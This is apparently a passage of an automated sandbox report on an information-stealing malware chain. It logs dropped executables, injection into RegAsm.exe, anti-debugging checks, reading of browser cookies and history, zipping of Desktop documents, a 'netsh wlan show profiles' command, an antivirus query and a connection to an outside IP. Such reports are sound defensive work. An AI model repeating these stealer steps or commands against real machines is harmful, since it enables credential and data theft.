                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe Process queried: DebugPort
                                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05560D2E rdtsc 0_2_05560D2E
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Code function: 4_2_0014EAA2 BlockInput, 4_2_0014EAA2
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Code function: 4_2_00102622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00102622
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Code function: 4_2_000D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 4_2_000D42DE
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Code function: 2_2_005C5D0B mov eax, dword ptr fs:[00000030h] 2_2_005C5D0B
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Code function: 2_2_005C9A72 mov eax, dword ptr fs:[00000030h] 2_2_005C9A72
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Code function: 4_2_000F4CE8 mov eax, dword ptr fs:[00000030h] 4_2_000F4CE8
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Code function: 8_2_00834130 mov eax, dword ptr fs:[00000030h] 8_2_00834130
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Code function: 8_2_00801A60 mov eax, dword ptr fs:[00000030h] 8_2_00801A60
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Code function: 4_2_00130B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 4_2_00130B62
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Code function: 4_2_00102622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00102622
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Code function: 4_2_000F083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_000F083F
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Code function: 4_2_000F09D5 SetUnhandledExceptionFilter, 4_2_000F09D5
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Code function: 4_2_000F0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_000F0C21
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe Memory allocated: page read and write | page guard

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Windows\System32\svchost.exe File created: BIT1659.tmp.6.dr
                                Source: C:\Windows\System32\rundll32.exe Network Connect: 193.233.132.167 80
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 439000
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 447000
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1154008
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Code function: 4_2_00131201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 4_2_00131201
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Code function: 2_2_00596E30 ShellExecuteA,Sleep,CreateThread,Sleep, 2_2_00596E30
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Code function: 4_2_0013B226 SendInput,keybd_event, 4_2_0013B226
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Code function: 4_2_001522DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 4_2_001522DA
                                Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe "C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe"
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe "C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe"
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe "C:\Users\user\AppData\Local\Temp\1000012001\amert.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 7556 -ip 7556
                                Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 2036
                                Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6188 -ip 6188
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2584 -ip 2584
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 2040
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 79380
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 12156 -ip 12156
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 12156 -s 844
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe "C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe"
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                                Source: C:\Windows\System32\rundll32.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00130B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,4_2_00130B62
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00131663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,4_2_00131663
Source: b3168c3d9b.exe, 00000004.00000000.2070491358.0000000000192000.00000002.00000001.01000000.00000009.sdmp, b3168c3d9b.exe, 0000000F.00000002.2493343445.0000000000192000.00000002.00000001.01000000.00000009.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorta.exe, explorta.exe, 00000003.00000002.2067305894.0000000000791000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: Program Manager
Source: b3168c3d9b.exe | Binary or memory string: Shell_TrayWnd
Source: 2531414c80.exe, 2531414c80.exe, 00000008.00000002.2507620764.0000000000A8D000.00000040.00000001.01000000.0000000C.sdmp, MPGPH131.exe, 00000013.00000002.2498548418.00000000011FD000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000014.00000002.2531990247.00000000011FD000.00000040.00000001.01000000.0000000D.sdmp | Binary or memory string: /HProgram Manager
Source: amert.exe, 0000001A.00000002.2452955674.0000000000A5E000.00000040.00000001.01000000.0000000E.sdmp | Binary or memory string: twProgram Manager
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Code function: 2_2_005ACBC7 cpuid 2_2_005ACBC7
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000149001\gold.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000149001\gold.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000150001\NewB.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000150001\NewB.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000152001\jok.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000152001\jok.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000153001\swiiii.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000153001\swiiii.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000181001\file300un.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000181001\file300un.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000208001\install.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000208001\install.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Users\user\Desktop\BNAGMGSPLO.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Users\user\Desktop\EEGWXUHVUG.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Users\user\Desktop\GRXZDKKVDB.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Users\user\Desktop\NVWZAPQSQL.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Users\user\Desktop\NVWZAPQSQL.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Users\user\Desktop\SQSJKEBWDT.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Users\user\Desktop\SQSJKEBWDT.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Code function: 2_2_005AC3CA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,2_2_005AC3CA
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0012D27A GetUserNameW,4_2_0012D27A
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0010B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,4_2_0010B952
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,4_2_000D42DE
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

                                barindex
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
                                Source: Yara matchFile source: 37.2.chrosha.exe.a00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 44.2.chrosha.exe.a00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.explorta.exe.590000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 26.2.amert.exe.860000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.explorta.exe.590000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 45.2.explorta.exe.590000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.file.exe.b40000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000002C.00000003.2631909972.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1986544625.0000000005350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002D.00000002.2674415512.0000000000591000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2026683858.0000000005140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002D.00000003.2633330881.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002C.00000002.3263497208.0000000000A01000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.2026672887.0000000000B41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000003.2019740253.0000000005110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2451043145.0000000000861000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
